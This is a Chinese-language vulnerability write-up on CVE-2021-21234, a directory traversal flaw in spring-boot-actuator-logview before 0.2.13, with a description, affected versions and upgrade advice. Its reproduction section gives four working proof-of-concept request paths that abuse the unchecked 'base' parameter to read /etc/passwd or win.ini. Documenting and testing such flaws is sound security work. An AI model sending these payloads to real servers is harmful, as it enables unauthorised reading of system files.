SpringBoot⽬录遍历(CVE-2021_21234)
Spring Boot ⽬录遍历(CVE-2021_21234)
漏洞简介:
spring-boot-actuator-logview 在⼀个库中添加了⼀个简单的⽇志⽂件查看器作为 spring boot 执⾏器端点。它是 maven
包“eu.hinsch:spring-boot-actuator-logview”。在 0.2.13 版本之前的 spring-boot-actuator-logview 中存在⽬录遍历漏洞。该库的本质是通过 admin(spring boot 执⾏器)HTTP 端点公开⽇志⽂件⽬录。要查看的⽂件名和基本⽂件夹(相对于⽇志⽂件夹根)都可以通过请求参数指定。虽然检查了⽂件名参数以防⽌⽬录遍历攻击(因此filename=../somefile 将不起作⽤),但没有充分检查基本⽂件夹参数,因此filename=somefile&base=../ 可以访问⽇志记录基⽬录之外的⽂件)。该漏洞已在 0.2.13 版中修复。0.2.12 的任何⽤户都应该能够毫⽆问题地进⾏更新,因为该版本中没有其他更改。除了更新或删除依赖项之外,没有解决此漏洞的⽅法。但是,删除运⾏应⽤程序的⽤户对运⾏应⽤程序不需要的任何⽬录的读取访问权限可以限制影响。此外,可以通过在反向代理后⾯部署应⽤程序来限制对 logview 端点的访问。
影响范围:
cve漏洞库
0.2.13版本之前
环境搭建
漏洞复现:
访问⾸页
构造poc,view函数对filename参数进⾏合法性校验,但是没有对base参数进⾏合法性校验。
"{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" # Windows
"{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" # windows
"{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../" # linux
"{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../" # linux
这⾥采⽤linux的第⼀种,得到回显
根据官⽅,升级到最新版

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。